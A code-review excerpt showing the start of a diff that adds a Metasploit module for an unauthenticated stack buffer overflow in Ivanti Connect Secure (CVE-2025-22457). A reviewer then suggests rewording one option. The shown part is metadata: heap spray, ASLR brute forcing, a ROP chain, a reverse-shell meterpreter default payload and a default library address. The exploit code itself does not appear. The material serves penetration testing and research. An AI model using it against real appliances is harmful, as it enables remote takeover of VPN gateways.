modules/exploits/linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457.rb

```diff
@@ -0,0 +1,374 @@
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  class IvantiError < StandardError; end
+  class IvantiNotFoundError < IvantiError; end
+  class IvantiUnexpectedResponseError < IvantiError; end
+  class IvantiUnknownError < IvantiError; end
+  class IvantiNetworkError < IvantiError; end
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution via Stack-based Buffer Overflow',
+        # TODO
+        'Description' => %q{
+          This module exploits a Stack-based Buffer Overflow vulnerability in
+          Ivanti Connect Secure to achieve remote code execution
+          (CVE-2025-22457). Versions 22.7R2.5 and earlier are vulnerable. Note
+          that Ivanti Pulse Connect Secure, Ivanti Policy Secure and ZTA gateways
+          are also vulnerable but this module doesn't support this software. Heap
+          spray is used to place our payload in memory at a predetermined
+          location. Due to ASLR, the base address of `libdsplibs` is unknown.
+          This library is used by the exploit to build a ROP chain and get
+          command execution. As a result, the module will brute force this
+          address starting from  the address set by the `LIBDSPLIBS_ADDRESS`
+          option.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Stephen Fewer', # Analysis and PoC
+          'Christophe De La Fuente', # Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2025-22457'],
+          ['URL', 'https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457'],
+          ['URL', 'https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis'],
+          ['URL', 'https://github.com/sfewer-r7/CVE-2025-22457']
+        ],
+        'DisclosureDate' => '2025-04-03',
+        'Platform' => 'linux',
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => %w[unix linux],
+              'Arch' => [ARCH_CMD],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('MAX_THREADS', [true, 'Max threads to use when spraying', 32]),
+        OptInt.new('WEB_CHILDREN', [true, 'The number of /home/bin/web child processes', 4]),
+        OptInt.new('LIBDSPLIBS_ADDRESS', [true, 'Base address of libdsplibs', 0xf6426000]),
```

Comment:
```suggestion
        OptInt.new('LIBDSPLIBS_ADDRESS', [true, 'Lowest possible base address of libdsplibs', 0xf6426000]),
```

or something like this